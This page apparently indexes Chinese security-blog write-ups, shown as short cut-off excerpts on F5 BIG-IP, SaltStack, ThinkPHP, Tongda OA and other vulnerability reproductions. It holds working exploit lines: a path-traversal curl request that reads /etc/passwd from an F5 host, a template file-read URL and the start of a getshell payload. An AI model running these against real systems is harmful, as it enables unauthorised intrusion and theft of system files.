curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: xxxxxx Conn...

ip:xx.xxx.xxx  扫描一下IP  就开了两个端口。一个3389  一个80 打开主页 然后访问钓鱼的页面  /index.php/Home/Index/index/ptm/18/ptb...

原文：https://www.cnblogs.com/cwkiller/p/12829974.html 参考：https://github.com/LandGrey/SpringBootVulExploit/blob/master/README.md 前端时间碰到一个Actuator  信息...

使用Docker 来启动一个环境 docker pull vulfocus/saltstack-cve_2020_11651 docker run -d -p 4506:4506 -p 4505:4505 vulfocus/saltstack-cve_2020_11651 然后当前的...

原文  首发揭示！pipe土豆：一种新型的通用提权细分 传递了一个asp 的木马 执行权限为iis 运行e...

说明一下 文件包含的文件只有2017和v11有   然后我这边是拿的一个2013 增强版做测试的。所以默认是没有那个文件包含的。只是作为演示 一、环境搭建 http://www.tongda2000...

测试代码 phpweb源码 一、环境搭建 宝塔Windows 6.5.0    +Nginx 1.17 + PHP 5.2 (PS:注意5.2最稳 其他版本可能报错) 安装成功之后...

POST /index.php?m=vod-search HTTP/1.1 Host: word.o2oxy.cn Content-Length: 500137 Cache-Control: max-age=0 Origin: http://word.o2oxy.cn Upgrade-Insecure-Requests: 1 Content-Type: appl...

http://127.0.0.1/?a=display&templateFile=/etc/passwd Getshell http://127.0.0.1/?a=fetch&tem%20...%20%27%27&content=%3Cphp%3Efile_put_con...

这里用的是Docker 镜像 docker pull php:7.2.3-fpm docker pull nginx 然后启动一个php  echo '<?php phpinfo();>' /var/www/html/index.php docker run --n...